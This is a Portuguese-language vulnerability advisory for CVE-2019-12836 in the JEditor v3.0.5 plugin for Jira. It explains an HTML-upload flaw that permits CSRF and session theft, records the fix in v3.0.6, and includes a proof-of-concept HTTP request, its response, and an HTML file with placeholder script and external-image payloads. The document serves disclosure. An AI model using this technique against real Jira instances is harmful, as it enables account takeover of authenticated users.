
CVE-2019-12836

JEditor v3.0.5 - Editor WYSIWYG para JIRA
Editor de texto rico simples mas poderoso para Jira. Importe emails HTML, cole conteúdos ricos, crie modelos e pré-popule campos.
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor - Editor WYSIWYG para Jira - v3.0.5
JEditor v3.0.5
O editor Bobronix JEditor antes da v3.0.6 para Jira permite que um atacante adicione uma URL/Link (a um problema existente) que pode causar a falsificação de uma requisição para um domínio de origem externa. Isso, por sua vez, pode permitir uma requisição falsificada que pode ser invocada no contexto de um usuário autenticado, levando ao roubo de tokens de sessão e à tomada de conta.
O JEditor v3.0.5 permite o upload de arquivos de vários tipos de extensão, um dos quais é '.HTML'. O JEditor é utilizado pelo JIRA para sua funcionalidade de upload de arquivos. Usando essa funcionalidade, um atacante pode carregar conteúdo malicioso.
Uma vez que o conteúdo malicioso é carregado, uma requisição subsequente pode ser feita para o conteúdo, o que permite a exibição e renderização inline do conteúdo no contexto do navegador de qualquer usuário autenticado. Isso pode permitir que um atacante falsifique uma requisição maliciosa em nome de qualquer usuário autenticado.
Falsificação de Solicitação entre Sites (CSRF)
Bug corrigido no JEditor v3.0.6
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
Permite uma requisição falsificada resultando em uma possibilidade de vetor de ataque no lado do cliente
Usuário autenticado é necessário para interagir com o link/URL incorporado
Crédito: Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna da Exploit Security